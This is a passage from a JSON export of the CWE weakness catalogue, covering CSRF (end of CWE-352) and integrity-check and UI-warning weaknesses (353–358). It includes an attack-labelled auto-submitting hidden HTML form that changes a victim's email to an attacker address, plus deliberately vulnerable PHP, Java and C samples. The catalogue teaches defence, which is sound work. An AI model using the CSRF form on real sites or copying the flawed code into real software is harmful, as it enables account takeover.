operation, send a separate confirmation request to ensure that the user intended to perform that operation.","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use the \\"double-submitted cookie\\" method as described by Felten and Zeller:","When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user\'s machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.","Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.","This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331]"]},"Effectiveness_Notes":"Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests."},{"Phase":"Architecture and Design","Description":"Do not use the GET method for any request that triggers a state change."},{"Phase":"Implementation","Description":"Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user\'s web browser in which a valid session already exists.","Body_Text":["The following HTML is intended to allow a user to update a profile.","profile.php contains the following code.","This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images.","The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as:","Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body\'s onload attribute, it will be automatically called when the victim loads the web page.","Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker\'s own address. At this stage, the user\'s identity has been compromised, and messages sent through this profile could be sent to the attacker\'s address."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"<form action=\\"/url/profile.php\\" method=\\"post\\"><input type=\\"text\\" name=\\"firstname\\"/><input type=\\"text\\" name=\\"lastname\\"/><br/><input type=\\"text\\" name=\\"email\\"/><input type=\\"submit\\" name=\\"submit\\" value=\\"Update\\"/></form>","xhtml:br":["","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"// initiate the session in order to validate sessionssession_start();if (! session_is_registered(\\"username\\")) {}update_profile();function update_profile {}","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["//if the session is registered to a valid user then allow update","// The user session is valid, so process the request","// and update the information"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"echo \\"invalid session detected!\\";[...]exit;","xhtml:br":["","","","","",""],"xhtml:i":"// Redirect user to login page"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"SendUpdateToDatabase($_SESSION[\'username\'], $_POST[\'email\']);[...]echo \\"Your profile has been successfully updated.\\";","xhtml:br":["","","","","",""],"xhtml:i":["// read in the data from $POST and send an update","// to the database"]}}]}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":{"#text":"<SCRIPT>function SendAttack () {}</SCRIPT><BODY onload=\\"javascript:SendAttack();\\"><form action=\\"http://victim.example.com/profile.php\\" id=\\"form\\" method=\\"post\\"><input type=\\"hidden\\" name=\\"firstname\\" value=\\"Funny\\"><input type=\\"hidden\\" name=\\"lastname\\" value=\\"Joke\\"><br/><input type=\\"hidden\\" name=\\"email\\"></form>","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"#text":"form.email = \\"attacker@example.com\\";form.submit();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// send to profile.php"}}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1703","Description":"Add user accounts via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1703"},{"Reference":"CVE-2004-1995","Description":"Add user accounts via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1995"},{"Reference":"CVE-2004-1967","Description":"Arbitrary code execution by specifying the code in a crafted img tag or URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1967"},{"Reference":"CVE-2004-1842","Description":"Gain administrative privileges via a URL in an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1842"},{"Reference":"CVE-2005-1947","Description":"Delete a victim\'s information via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1947"},{"Reference":"CVE-2005-2059","Description":"Change another user\'s settings via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2059"},{"Reference":"CVE-2005-1674","Description":"Perform actions as administrator via a URL or an img tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1674"},{"Reference":"CVE-2009-3520","Description":"modify password for the administrator","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3520"},{"Reference":"CVE-2009-3022","Description":"CMS allows modification of configuration via CSRF attack against the administrator","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3022"},{"Reference":"CVE-2009-3759","Description":"web interface allows password changes or stopping a virtual machine via CSRF","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3759"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-Site Request Forgery (CSRF)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A5","Entry_Name":"Cross Site Request Forgery (CSRF)","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":9,"Entry_Name":"Cross-site Request Forgery"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"462"}},{"attr":{"@_CAPEC_ID":"467"}},{"attr":{"@_CAPEC_ID":"62"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 37"}},{"attr":{"@_External_Reference_ID":"REF-329"}},{"attr":{"@_External_Reference_ID":"REF-330"}},{"attr":{"@_External_Reference_ID":"REF-331"}},{"attr":{"@_External_Reference_ID":"REF-332"}},{"attr":{"@_External_Reference_ID":"REF-333"}},{"attr":{"@_External_Reference_ID":"REF-334"}},{"attr":{"@_External_Reference_ID":"REF-335"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-956"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user\'s profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause."},{"attr":{"@_Type":"Theoretical"},"xhtml:p":"The CSRF topology is multi-channel:","xhtml:ol":{"xhtml:li":["Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel.","Intermediary (as user) to server (as victim). The activation point is an internal channel."]}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"Tom Stracener","Modification_Date":"2009-05-20","Modification_Comment":"Added demonstrative example for profile."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationship_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"353":{"attr":{"@_ID":"353","@_Name":"Missing Support for Integrity Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.","Extended_Description":"If integrity check values or \\"checksums\\" are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality in a protocol removes the first application-level check of data that can be used. The end-to-end philosophy of checks states that integrity checks should be performed at the lowest level that they can be completely implemented. Excluding further sanity checks and input validation performed by applications, the protocol\'s checksum is the most important level of checksum, since it can be performed more completely than at any previous level and takes into account entire messages, as opposed to single packets.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"354","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data that is parsed and used may be corrupted."},{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Other"],"Note":"Without a checksum it is impossible to determine if any changes have been made to the data after it was sent."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Add an appropriately sized checksum to the protocol, ensuring that data received may be simply validated before it is parsed and used."},{"Phase":"Implementation","Description":"Ensure that the checksums present in the protocol design are properly implemented and added to each message before it is sent."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a request packet is received, and privileged information is sent to the requester:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"#text":"DatagramPacket rp = new DatagramPacket(rData,rData.length);outSock.receive(rp);InetAddress IPAddress = rp.getAddress();int port = rp.getPort();out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out, out.length, IPAddress, port);outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}},"Body_Text":"The response containing secret data has no integrity check associated with it, allowing an attacker to alter the message without detection."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to add integrity check value"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"389"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"665"}},{"attr":{"@_CAPEC_ID":"74"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 15: Not Updating Easily." Page 231"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Failure to Add Integrity Check Value","attr":{"@_Date":"2010-12-13"}}}},"354":{"attr":{"@_ID":"354","@_Name":"Improper Validation of Integrity Check Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not validate or incorrectly validates the integrity check values or \\"checksums\\" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.","Extended_Description":"Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the algorithm used for calculating the checksum. It is then a simple matter of implementing the calculation and verifying that the calculated checksum and the received checksum match. Improper verification of the calculated checksum and the received checksum can lead to far greater consequences.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"353","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"Integrity checks usually use a secret key that helps authenticate the data origin. Skipping integrity checking generally opens up the possibility that new data from an invalid source can be injected."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data that is parsed and used may be corrupted."},{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Other"],"Note":"Without a checksum check, it is impossible to determine if any changes have been made to the data after it was sent."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that the checksums present in messages are properly checked in accordance with the protocol specification before they are parsed and used."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0); serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);","xhtml:br":["","",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"#text":"DatagramPacket packet = new DatagramPacket(data,data.length,IPAddress, port);socket.send(sendPacket);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check integrity check value"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"145"}},{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Check Integrity Check Value","attr":{"@_Date":"2009-03-10"}}}},"356":{"attr":{"@_ID":"356","@_Name":"Product UI does not Warn User of Unsafe Actions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system.","Extended_Description":"Software systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the user downloads a file from an unknown source and attempts to execute the file on their machine, then the application\'s GUI can indicate that the file is unsafe.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1055","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1055"},{"Reference":"CVE-1999-0794","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0794"},{"Reference":"CVE-2000-0277","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0277"},{"Reference":"CVE-2000-0517","Description":"Product does not warn user about a certificate if it has already been accepted for a different site. Possibly resultant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0517"},{"Reference":"CVE-2005-0602","Description":"File extractor does not warn user it setuid/setgid files could be extracted. Overlaps privileges/permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0602"},{"Reference":"CVE-2000-0342","Description":"E-mail client allows bypass of warning for dangerous attachments via a Windows .LNK file that refers to the attachment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product UI does not warn user of unsafe actions"}},"Notes":{"Note":[{"#text":"Often resultant, e.g. in unhandled error conditions.","attr":{"@_Type":"Relationship"}},{"#text":"Can overlap privilege errors, conceptually at least.","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"357":{"attr":{"@_ID":"357","@_Name":"Insufficient UI Warning of Dangerous Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-1099","Description":"User not sufficiently warned if host key mismatch occurs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1099"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient UI warning of dangerous operations"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"358":{"attr":{"@_ID":"358","@_Name":"Improperly Implemented Security Check for Standard","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"345","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"290","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":"This is an implementation error, in which the algorithm/technique requires certain security-related behaviors or conditions that are not implemented or checked properly, thus causing a vulnerability."}}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0862","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"},{"Reference":"CVE-2002-0970","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970"},{"Reference":"CVE-2002-1407","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted 